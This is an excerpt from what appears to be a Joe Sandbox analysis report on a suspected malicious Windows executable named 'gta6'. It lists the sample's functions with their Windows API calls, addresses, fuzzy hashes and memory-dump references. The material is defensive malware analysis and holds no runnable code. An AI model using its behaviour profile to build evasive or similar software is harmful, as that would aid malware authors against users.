GetLongPathNameW.KERNELBASE(?,?,?,0000000140001F92), ref: 000000014000DA31
FreeLibrary.KERNEL32 ref: 000000014000DA38

Strings

Kernel32.DLL, xrefs: 000000014000D9F9
GetLongPathNameW, xrefs: 000000014000DA13

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: LibraryPath$AddressAllocateFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 1993255246-2943376620
Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340

Function 000000014000C4D0 Relevance: 3.0, APIs: 2, Instructions: 20COMMON

Download Yara Rule

APIs

RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C8A5
RtlAddVectoredExceptionHandler.NTDLL ref: 000000014000C8C0

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: ExceptionHandlerVectored$Remove
String ID:
API String ID: 3670940754-0
Opcode ID: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction ID: 54ed52b0d94e107c171475cce83a86a7777a808cb3853d4771323e3d57a36066
Opcode Fuzzy Hash: 24e0dcc2aecd05812467741a67881873fe67c89a035702fa94287bcbf95b7463
Instruction Fuzzy Hash: 8AF0ED7061370485FE5BDB93B8987F472A0AB4C7C0F184029BB49076719F3C88A48348

Function 0000000140016FB4 Relevance: 19.6, APIs: 13, Instructions: 81
memoryregistrythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsAlloc.KERNEL32 ref: 0000000140016FE2
RtlInitializeCriticalSection.NTDLL ref: 0000000140016FF1
TlsGetValue.KERNEL32 ref: 0000000140017007
RtlAllocateHeap.NTDLL ref: 0000000140017027
RtlEnterCriticalSection.NTDLL ref: 000000014001703C
RtlLeaveCriticalSection.NTDLL ref: 000000014001705F
GetCurrentProcess.KERNEL32 ref: 0000000140017065
GetCurrentThread.KERNEL32 ref: 000000014001706E
GetCurrentProcess.KERNEL32 ref: 0000000140017077
DuplicateHandle.KERNEL32 ref: 000000014001709C
RegisterWaitForSingleObject.KERNEL32 ref: 00000001400170C1
TlsSetValue.KERNEL32 ref: 00000001400170D0
RtlAllocateHeap.NTDLL ref: 00000001400170E3

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalCurrentSection$AllocateHeapProcessValue$AllocDuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
String ID:
API String ID: 2673290768-0
Opcode ID: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
Instruction ID: 0ebcb89b5f496a055c7edd3f2936d7e00332f328880e18a7a0f049a68aa3c175
Opcode Fuzzy Hash: aef90992288fd509fbd74998ffb1029e6b7b59a5f56d271f65cebbdd5f433d17
Instruction Fuzzy Hash: 0641E172201B409AEB129F62E8447A977A0F78CBD5F484129EB4D0B774DF39C999D740

Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 000000014000CA00: memcpy.MSVCRT ref: 000000014000CA47

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266

Part of subcall function 000000014000DA6C: SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
Part of subcall function 000000014000DA6C: DeleteFileW.KERNEL32 ref: 000000014000DA95

Part of subcall function 000000014000D914: wcsncpy.MSVCRT ref: 000000014000D932
Part of subcall function 000000014000D914: wcslen.MSVCRT ref: 000000014000D944
Part of subcall function 000000014000D914: CreateDirectoryW.KERNEL32 ref: 000000014000D994

GetTempFileNameW.KERNEL32 ref: 0000000140002040

Part of subcall function 0000000140012210: RtlReAllocateHeap.NTDLL ref: 0000000140012293

GetTempFileNameW.KERNEL32 ref: 00000001400020C1
PathAddBackslashW.SHLWAPI ref: 00000001400020CD
PathRenameExtensionW.SHLWAPI ref: 000000014000212E
GetTempFileNameW.KERNEL32 ref: 0000000140002153

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: File$NameTemp$Heap$AllocateErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememcpywcslenwcsncpy
String ID:
API String ID: 1881527299-0
Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400112A8: RtlEnterCriticalSection.NTDLL ref: 00000001400112C4
Part of subcall function 00000001400112A8: RtlLeaveCriticalSection.NTDLL ref: 0000000140011355

CreateFileW.KERNEL32 ref: 000000014000DEED
CreateFileW.KERNEL32 ref: 000000014000DF37
CreateFileW.KERNEL32 ref: 000000014000DF7E
CreateFileW.KERNEL32 ref: 000000014000DFAC
RtlAllocateHeap.NTDLL ref: 000000014000DFED
SetFilePointer.KERNEL32 ref: 000000014000E047

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: File$Create$CriticalSection$AllocateEnterHeapLeavePointer
String ID:
API String ID: 3319923023-0
Opcode ID: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
Opcode Fuzzy Hash: 3acf6fa9c56a0c7a834e2f73706e5fbcdc580a0c2c593d59e461b3465d2a83a2
Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

Function 0000000140007284 Relevance: 7.6, APIs: 5, Instructions: 56
synchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 00000001400072B3
RtlEnterCriticalSection.NTDLL ref: 00000001400072CC
WaitForSingleObject.KERNEL32 ref: 00000001400072E4
CloseHandle.KERNEL32 ref: 00000001400072F1
RtlLeaveCriticalSection.NTDLL ref: 0000000140007344

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
String ID:
API String ID: 458812214-0
Opcode ID: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
Instruction ID: 37a7c27cb33ea643b241ae4d06e82751f63dd7a6f22fff0809f2f79c8fcd043f
Opcode Fuzzy Hash: dccc955c77b5a6b17664b800404429e9a916fd3538430a1521d222f39eb64d12
Instruction Fuzzy Hash: 5E21FD76204B0081EB06DB12E8943E973A4FB8CBC4F988126EB8D477B9DF39C906C300

Function 0000000140016EB8 Relevance: 7.6, APIs: 5, Instructions: 50
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

UnregisterWait.KERNEL32 ref: 0000000140016ECE
CloseHandle.KERNEL32 ref: 0000000140016ED8
RtlEnterCriticalSection.NTDLL ref: 0000000140016EE5
RtlLeaveCriticalSection.NTDLL ref: 0000000140016F1A
HeapFree.KERNEL32 ref: 0000000140016F3F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CriticalSection$CloseEnterFreeHandleHeapLeaveUnregisterWait
String ID:
API String ID: 2482123561-0
Opcode ID: a7666325c2cc4be02206466af1cdb72a6e7212eec2e023cca2c657541dd83cd8
Instruction ID: 196df3400b90f2231c07c3d27c18431f6acaa00a9f37171cec9b4569f9552cf6
Opcode Fuzzy Hash: a7666325c2cc4be02206466af1cdb72a6e7212eec2e023cca2c657541dd83cd8
Instruction Fuzzy Hash: 9521D636205A5092EB169F63E9803A973A1F78CBC0F548425EB5E4BB75DF3AD862D340

Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012450: wcslen.MSVCRT ref: 000000014001246E

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266

Part of subcall function 0000000140012210: RtlReAllocateHeap.NTDLL ref: 0000000140012293

GetModuleHandleW.KERNEL32 ref: 00000001400061AE

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 00000001400125D0: TlsGetValue.KERNEL32 ref: 00000001400125DA

Part of subcall function 0000000140007DC0: CharUpperW.USER32 ref: 0000000140007E24

Part of subcall function 0000000140001E57: GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

PathRemoveBackslashW.SHLWAPI ref: 00000001400063A7

Part of subcall function 0000000140012520: TlsGetValue.KERNEL32 ref: 000000014001252A

Part of subcall function 000000014000C45C: SetEnvironmentVariableW.KERNEL32 ref: 000000014000C476

PathQuoteSpacesW.SHLWAPI ref: 00000001400064FF
PathQuoteSpacesW.SHLWAPI ref: 000000014000656B

Part of subcall function 0000000140007284: CreateThread.KERNEL32 ref: 00000001400072B3
Part of subcall function 0000000140007284: RtlEnterCriticalSection.NTDLL ref: 00000001400072CC
Part of subcall function 0000000140007284: RtlLeaveCriticalSection.NTDLL ref: 0000000140007344

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Value$HeapPath$AllocateCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
String ID:
API String ID: 116240943-0
Opcode ID: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
Opcode Fuzzy Hash: 694b1c19e8755626ce23e73af158c886c1e20011c5824741ac95cd017688f4b7
Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32 ref: 000000014000E664
memcpy.MSVCRT ref: 000000014000E69F

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FilePointermemcpy
String ID:
API String ID: 1104741977-0
Opcode ID: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
Opcode Fuzzy Hash: d3ec28a03912e6d80b261c35e196ed703beb3e203bb26ae9a29097b16b2476ce
Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

Function 00000001400126D0 Relevance: 4.6, APIs: 3, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00000001400126E2
RtlReAllocateHeap.NTDLL ref: 0000000140012762
RtlReAllocateHeap.NTDLL ref: 00000001400127C2

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
Instruction ID: 7cab8ebf5e8be7cca61280ad2f22e4d1c3948fe97e6d3aaf46f0ca18481b9e55
Opcode Fuzzy Hash: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
Instruction Fuzzy Hash: E7317336609B4486DB21CB5AE49035AB7A0F7CCBE8F144216EB8D47B78DF79C691CB40

Function 000000014000E3F0 Relevance: 4.6, APIs: 3, Instructions: 67
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteFile.KERNEL32 ref: 000000014000E472
WriteFile.KERNEL32 ref: 000000014000E4D6
HeapFree.KERNEL32 ref: 000000014000E4E8

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: FileWrite$FreeHeap
String ID:
API String ID: 74418370-0
Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

Function 0000000140012210 Relevance: 4.6, APIs: 3, Instructions: 51
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 0000000140012223
RtlAllocateHeap.NTDLL ref: 0000000140012266
RtlReAllocateHeap.NTDLL ref: 0000000140012293

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: AllocateHeap$Value
String ID:
API String ID: 2497967046-0
Opcode ID: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
Instruction ID: c44eb9ef2cf98d3488e4d96c7e244cbf8e5b64558ad0ce04898d2a75112beb9a
Opcode Fuzzy Hash: 30ed22d9c32a89c2cfd42ea85ebcc15196c91459ae3e4d92826612402d9637be
Instruction Fuzzy Hash: 1521A336609B40C6DA25CB5AE89136AB7A1F7CDBD4F108126EB8D87B38DF3DC5518B00

Function 000000014000D914 Relevance: 4.5, APIs: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcsncpy.MSVCRT ref: 000000014000D932
wcslen.MSVCRT ref: 000000014000D944
CreateDirectoryW.KERNEL32 ref: 000000014000D994

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CreateDirectorywcslenwcsncpy
String ID:
API String ID: 961886536-0
Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

Function 000000014000B538 Relevance: 4.5, APIs: 3, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 000000014000B547
00007FFB1B7A5550.COMCTL32 ref: 000000014000B561
CoInitialize.OLE32 ref: 000000014000B569

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: 00007A5550Initializememset
String ID:
API String ID: 1902644400-0
Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

Function 00000001400029C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetExitCodeProcess.KERNEL32 ref: 0000000140002ADD

Strings

open, xrefs: 0000000140002A68, 0000000140002A75

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: CodeExitProcess
String ID: open
API String ID: 3861947596-2758837156
Opcode ID: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
Instruction ID: 9a8e33d82e51c75021cc1a1bc422673ad63e4121514530fd256563005765fdb1
Opcode Fuzzy Hash: 88cc45060d987c4e95335cc00aeb877f29fe35eccabe24fc030c7400d8127be6
Instruction Fuzzy Hash: 6C315E73A19A84D9DA619B6AF8417EE6364F388784F404415FF8D07B6ADF3CC2958B40

Function 0000000140001000 Relevance: 3.1, APIs: 2, Instructions: 112
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012060: HeapCreate.KERNEL32 ref: 000000014001206E
Part of subcall function 0000000140012060: TlsAlloc.KERNEL32 ref: 000000014001207B

Part of subcall function 000000014000C980: HeapCreate.KERNEL32 ref: 000000014000C98E

Part of subcall function 000000014000B538: memset.MSVCRT ref: 000000014000B547
Part of subcall function 000000014000B538: 00007FFB1B7A5550.COMCTL32 ref: 000000014000B561
Part of subcall function 000000014000B538: CoInitialize.OLE32 ref: 000000014000B569

Part of subcall function 00000001400120D0: RtlAllocateHeap.NTDLL ref: 0000000140012123

Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD11
Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CD42
Part of subcall function 000000014000CCD8: RtlAllocateHeap.NTDLL ref: 000000014000CDB2

Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D56E
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D58F
Part of subcall function 000000014000D524: HeapFree.KERNEL32 ref: 000000014000D5A1

Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D476
Part of subcall function 000000014000D444: RtlAllocateHeap.NTDLL ref: 000000014000D491

Part of subcall function 0000000140011D30: RtlAllocateHeap.NTDLL ref: 0000000140011D82
Part of subcall function 0000000140011D30: memset.MSVCRT ref: 0000000140011DB6

Part of subcall function 00000001400120D0: RtlReAllocateHeap.NTDLL ref: 0000000140012151
Part of subcall function 00000001400120D0: HeapFree.KERNEL32 ref: 0000000140012194

Part of subcall function 000000014000C4D0: RtlRemoveVectoredExceptionHandler.NTDLL ref: 000000014000C8A5
Part of subcall function 000000014000C4D0: RtlAddVectoredExceptionHandler.NTDLL ref: 000000014000C8C0

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: RtlAllocateHeap.NTDLL ref: 0000000140012266

HeapDestroy.KERNEL32 ref: 000000014000124C
ExitProcess.KERNEL32 ref: 0000000140001258

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Heap$Allocate$Free$CreateErrorExceptionHandlerLastValueVectoredmemset$00007A5550AllocDestroyExitInitializeProcessRemove
String ID:
API String ID: 2051489642-0
Opcode ID: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
Instruction ID: f14933b67cb23f8d7438bd3232522d16ce9264245af44939dd0cca49c0d9e1bd
Opcode Fuzzy Hash: da1de5b617aebde20a676659b7b6f93e9ebd451269a6d64086362a559b0bc010
Instruction Fuzzy Hash: 7A5108F0A11A4481FA03F7A3F8527E926159B9D7D4F808129BF1D1B3F3DD3A85598B22

Function 0000000140011D30 Relevance: 3.1, APIs: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140011EF4: HeapFree.KERNEL32 ref: 0000000140011F4D

RtlAllocateHeap.NTDLL ref: 0000000140011D82
memset.MSVCRT ref: 0000000140011DB6

Memory Dump Source

Source File: 00000000.00000002.1652316071.0000000140001000.00000040.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.1652295982.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652345054.0000000140024000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652366536.0000000140026000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_140000000_gta6.jbxd

Similarity

API ID: Heap$AllocateFreememset
String ID:
API String ID: 2774703448-0
Opcode ID: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
Instruction ID: a75182db50c1f984f89b78753495ac0ab196a1c9ad642d63c8067afd0bb8a22e
Opcode Fuzzy Hash: b0a2c0981b5be639708a6f3d132545d6a9b78e5287bbc147a43e1ebb83c57dbc
Instruction Fuzzy Hash: 12213B32605B5086EA1ADB53BC4179AA6A8F7C8FD0F498025AF584BB66DE79C852C340

Function 0000000140002930 Relevance: 3.0, APIs: 2, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400123E0: TlsGetValue.KERNEL32 ref: 00000001400123F8

